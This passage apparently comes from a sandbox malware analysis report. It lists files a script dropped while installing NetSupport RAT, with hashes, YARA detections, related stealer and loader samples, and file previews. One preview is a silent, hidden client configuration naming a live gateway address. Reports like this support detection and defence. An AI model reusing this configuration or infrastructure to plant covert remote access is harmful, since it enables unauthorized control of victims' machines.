	awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs	Get hash	malicious	GuLoader, Remcos	Browse	79.141.173.158
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	79.141.173.158
	vwkb5DQRAL.exe	Get hash	malicious	Stealc, Vidar	Browse	79.141.173.158
	z51awb_shipping.cmd	Get hash	malicious	GuLoader, Remcos	Browse	79.141.173.158
	file.exe	Get hash	malicious	Vidar	Browse	79.141.173.158
	Viderefrt.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	79.141.173.158
	Dysacousma41.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	79.141.173.158

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\o2xqxqs\HTCTL32.DLL	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	Update.js	Get hash	malicious	NetSupport RAT	Browse
	update.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse
	updates.js	Get hash	malicious	NetSupport RAT	Browse
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse

Created / dropped Files

C:\ProgramData\o2xqxqs.zip

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2296772
Entropy (8bit):	7.99732736104595
Encrypted:	true
SSDEEP:	49152:a51ZlQlEDThXBJOhHvh6J6h2SFFGf0RBNTQfYc9jh23eWeB3/YSBm7WIqRRakTS7:E1ZFXa/hRFY89YYc9jh23redpmQRw
MD5:	F2C5EA82A86340078219E6F4FBD09574
SHA1:	BC02C3FD5321A130354F8827C821D334C0AC1E13
SHA-256:	B8F58A72F7D2733A07AC05EAA82DA598EBC0ECECFE3DBC21DE5CA7D13CB8AF4B
SHA-512:	D5C6EB11ADD22A67BC7D328C9967D38E6A858F39B1347E5171D829925DADF36720643F7801B843ED017C337D1A47D8AB6E0CF5BE39875CEE2886987554BFEA25
Malicious:	false
Reputation:	low
Preview:	PK.........DWW..%.&l..........client32.exe.\|.xT.....N..".R....A.W..@........Tj.$...Q.@... ...7!...@..iJ.......;3....R..~.....;g...3gfnx...T.@......b../....d.@...n{...ts....5d.....]%.i..v...:3lZ..i]G.9v.:...\__...F.).C....(..B..t..P.f....&..9..e.k9.:.K.X...8..`.@...Oph.@W...B.p....N.]A.....A^...!..Y..T...+..t........`..KUg.....`..]w..=k...g...7.......4<..=f..\|..8T.."...z..:..ae>s.L.(....f.U.%=.).Iq.....T..px-..8G.G...`8.>{#.=....&B..G..)t........uY:R0..C.....C.........G......1r.e..K5HMop..ZJ..6.&...fM.........m....G..W.I0....hb.."NDS5...>MTz-.".i.....v..[..JC.dC........^4....4.W.U.SZ.'..........O...C.O.+..X...Cs.)S.L`3'8t.....Y..Te....~aS.G...M......9..g......0}.\|-.;..N%....Hi......$.....kC..t..`..,..!&..X..$.6k..v....o_.I.......x......?_..'.A..../`S.b...u.].....t..9.6...g.l..\|.2...Nte.}.N....]........)d..Q{.>g.p?G.O...g.......S.Z*.-.....^.......[......V..i...V.oh.~l+......R9.}W.F..q....4...._`G.CK..u.@l.....7l.W/..b.&... H.1..I.........

C:\ProgramData\o2xqxqs\HTCTL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.7547459359511395
Encrypted:	false
SSDEEP:	6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
MD5:	C94005D2DCD2A54E40510344E0BB9435
SHA1:	55B4A1620C5D0113811242C20BD9870A1E31D542
SHA-256:	3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
SHA-512:	2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:	Filename: hkpqXovZtS.exe, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: Update.js, Detection: malicious, Browse Filename: update.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: Update 124.0.6367.158.js, Detection: malicious, Browse Filename: updates.js, Detection: malicious, Browse Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\LogoDev.png

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24504
Entropy (8bit):	7.872865717955356
Encrypted:	false
SSDEEP:	384:qSVmAf6Ft8Itb+e2b9tdTwEy9kXs6vWZZCbiXSeEO/12Hb40yrWSbN8qtA:qImAfe7gx3y6MZC2CeV2747zbN8
MD5:	B8F553FBD3DC34B58BC77A705711023D
SHA1:	4AB1052F906FDA96F877E398426DA5646574C878
SHA-256:	2761C60263A2919B856915BDD2A0604B7F0E56E59D893AB13CCCEF2B7C967229
SHA-512:	15A1DF0DBB06B4BB64A2B8CD7AD22578292D5ECDEC64303350E027F9F87FA8A825CB1CC97F94862D8C235C85B0C79A4FEABFB89D9E0B77BE62AAB25785122A60
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...X...X......f...._.IDATx........................................................................................................................................................................................................................................................f...:.(L..A!..].'twW..3.2 ..........'k.]Kd.\|...mz..U...Tu.L..~.W.Wc......................rv.iv%.q=....u..>.o.......k.y.wo........ .,...~..U..._.7/g.........m.....*w.`........p.....8...q.,.,.g....:Q.Rt....Ga.............Z..S+.....=.,....T.Ew.....0U..`.....S.......w....Va..#.\|Mo.....eY.eY....m^....r.P..S{#......D.I.y..K.&&9....@...u.^...D.....U..l.keY.eY....rv.]..H..A....^..RpQ.)@,.Im..s.~.U.....,j....._m?.V...z95l}.,.,.P....b..R.>rV.Q_m.0....(.b..@.,./.T[.S;.X....`..w.,...j.o..M.......~^......0.8.....$][=`.V.)..O..1....+...3...eY.e.[.]....s...z.E\.I!G..;).'...d.m>..+w.M.=X.S......g.o.~0........j.{.hY.eY.7.................G..e(K...y..IL.F)g..{.....Z.J}...qn..+.%

C:\ProgramData\o2xqxqs\NSM.LIC

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.924914741174998
Encrypted:	false
SSDEEP:	6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
MD5:	E9609072DE9C29DC1963BE208948BA44
SHA1:	03BBE27D0D1BA651FF43363587D3D6D2E170060F
SHA-256:	DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
SHA-512:	F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
Malicious:	false
Preview:	1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

C:\ProgramData\o2xqxqs\NSM.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Generic INItialization configuration [Features]
Category:	dropped
Size (bytes):	6458
Entropy (8bit):	4.645519507940197
Encrypted:	false
SSDEEP:	96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
MD5:	88B1DAB8F4FD1AE879685995C90BD902
SHA1:	3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
SHA-256:	60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
SHA-512:	4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
Malicious:	false
Preview:	..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

C:\ProgramData\o2xqxqs\PCICHEK.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.292094060787929
Encrypted:	false
SSDEEP:	192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
MD5:	104B30FEF04433A2D2FD1D5F99F179FE
SHA1:	ECB08E224A2F2772D1E53675BEDC4B2C50485A41
SHA-256:	956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
SHA-512:	5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\PCICL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3740024
Entropy (8bit):	6.527276298837004
Encrypted:	false
SSDEEP:	49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
MD5:	D3D39180E85700F72AAAE25E40C125FF
SHA1:	F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
SHA-256:	38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
SHA-512:	471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\o2xqxqs\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\TCCTL32.DLL

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.80911343409989
Encrypted:	false
SSDEEP:	12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
MD5:	2C88D947A5794CF995D2F465F1CB9D10
SHA1:	C0FF9EA43771D712FE1878DBB6B9D7A201759389
SHA-256:	2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
SHA-512:	E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 6%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\VERSION

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.6464393446710153
Encrypted:	false
SSDEEP:	3:SV0n:SKn
MD5:	01395638B9B0FCB529AB99A70CCCB307
SHA1:	7D9B185D216509ECF5A4D93353B2F3D6FCC339EE
SHA-256:	A3FB3EBFB09A535818510A670BDD0FEBB34DBD91BBE7A72F2F930D05FA4E936B
SHA-512:	F91C6F0847A95E178BAEC100BBE23ADB1BAE2DAF01683BAAF1FED518D33ED3407E6EE2E047C5B5E38DEE41C8E13789756906EF237E9B6CCDFDFD5B6724B021DF
Malicious:	false
Preview:	1.0.2836.0

C:\ProgramData\o2xqxqs\client32.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	103824
Entropy (8bit):	6.674952714045651
Encrypted:	false
SSDEEP:	768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
MD5:	C4F1B50E3111D29774F7525039FF7086
SHA1:	57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
SHA-256:	18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
SHA-512:	005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\o2xqxqs\client32.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........\|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\client32.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	671
Entropy (8bit):	5.43575482962587
Encrypted:	false
SSDEEP:	12:KxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSue1ABEDEa:KI2hzEPI8ZNR8pivlnxOoG1fXXfD/X1J
MD5:	1F3911AA581F74218174A75D1D44AEBE
SHA1:	67CAC52F8457C77A93338109D6615145D1148E17
SHA-256:	010DC2CDBDBCA9199ACA04A93165259B48BBACAAFD142D0597E2B168B0C7809E
SHA-512:	C5D825BCD2C44F8E83EF1B3A0F185F93C23E365CFF55051231C676FC5B68DBF50EF7A6A466E1B2FD3B3C942B68270207E08EB18ABA04E768226419C8054AD30F
Malicious:	false
Preview:	0x4b88cba7....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=194.180.191.64:443..gskmode=0..GSK=EK:M?KCNHK;K?CEBHH>DAFEG..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

C:\ProgramData\o2xqxqs\delegatedWebFeatures.sccd

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	5.982171430913221
Encrypted:	false
SSDEEP:	384:nPzOC+5CNMCUDCGxkKp2Z+TgNKvoUwyBDZS/1pMimimp5F9aQBb+ZIo1PCCZAhy1:niZtnLkKp2Z+TgNKvoUwqVS/L3mimp5i
MD5:	7FD9CD05F23D42FB6DEDA65BD1977AC9
SHA1:	DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
SHA-256:	CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
SHA-512:	6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217

C:\ProgramData\o2xqxqs\install_state.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.5509498109363986
Encrypted:	false
SSDEEP:	24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
MD5:	3F78A0569C858AD26452633157103095
SHA1:	8119BCC1D66B17CCD286FEF396FA48594188C4D0
SHA-256:	D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
SHA-512:	89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
Malicious:	false
Preview:	//353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v

C:\ProgramData\o2xqxqs\manifest.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.824253848576346
Encrypted:	false
SSDEEP:	6:v5975JVSS18iMkh26VlcmutLwyAGI/zj//gQNMC:Bbt18l+LlMLqGU/gQNMC
MD5:	442699C95B20A60470421C6A4D29960F
SHA1:	C7317F2D2414C991C21205BA3C68A187B997E3C1
SHA-256:	44844CF3DDE6E80087AE0E6BF0D9326D7EF7D23326D24AC83AF0850BE26923D2
SHA-512:	C89CF089F7FEEB80C6DED11F1FCE84287ABE8216A6E05723D1A7FAF567C501C043CD1246FF8DBEE1240D2D79C41B698EF4CC3459589E68E5BFC5BED7FC3A150B
Malicious:	false
Preview:	{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "update_url": "https://clients2.google.com/service/update2/crx", . "description": "Contains preloaded data for Media Engagement".}.

C:\ProgramData\o2xqxqs\msvcr100.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\o2xqxqs\new_delegatedWebFeatures.sccd

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (15941), with CRLF line terminators
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	5.982171430913221
Encrypted:	false
SSDEEP:	384:nPzOC+5CNMCUDCGxkKp2Z+TgNKvoUwyBDZS/1pMimimp5F9aQBb+ZIo1PCCZAhy1:niZtnLkKp2Z+TgNKvoUwqVS/L3mimp5i
MD5:	7FD9CD05F23D42FB6DEDA65BD1977AC9
SHA1:	DF25A2C9E1E9FA05805DA69FF41337B9F59755FB
SHA-256:	CA6C469655D4D0D7CE5BEB447DAB43048A377A6042C4800B322257567AC135D9
SHA-512:	6AE8ADDF0C55058803305F937593BA02202C99639A572BE0CACBFDE598019CF8DB7067E0392BD66C43CF7D8780E454EC5E08D68BCFD491B60A450FFC280C81B8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<CustomCapabilityDescriptor xmlns="http://schemas.microsoft.com/appx/2016/sccd" xmlns:s="http://schemas.microsoft.com/appx/2016/sccd">...<CustomCapabilities>....<CustomCapability Name="Microsoft.delegatedWebFeatures_8wekyb3d8bbwe"/>...</CustomCapabilities>...<AuthorizedEntities>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Canary_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="f6f717a43ad9abddc8cefdde1c505462535e7d1307e630f9544a2d14fe8bf26e"/>....<AuthorizedEntity AppPackageFamilyName="Microsoft.MicrosoftEdge.Dev_8wekyb3d8bbwe" CertificateSignatureHash="279cd652c4e252bfbe5217

C:\ProgramData\o2xqxqs\nskbfltr.inf

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\ProgramData\o2xqxqs\nsm_vpro.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\ProgramData\o2xqxqs\package_metadata

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	2.4193819456463714
Encrypted:	false
SSDEEP:	3:SV6:SU
MD5:	72E3BED9C0F2498AE7F7B8251EB63956
SHA1:	E9366F86EF5C31D2141FB5D209214D94DD1E24AF
SHA-256:	96E946E3EE860C6FAF9557327EFA311AE804AA58DD58632261B16C3C567BAA5A
SHA-512:	68EFACA86096F94C5FC7972F073361E4B12A3219834C0F3A6933837A35FA023A87D310B9E5AA2A8F88F9069320C60A490A24BA47219925010D69F88910C99758
Malicious:	false
Preview:	1.0.8.0..

C:\ProgramData\o2xqxqs\pcicapi.dll

Download File

Process:	C:\Windows\System32\wscript.exe
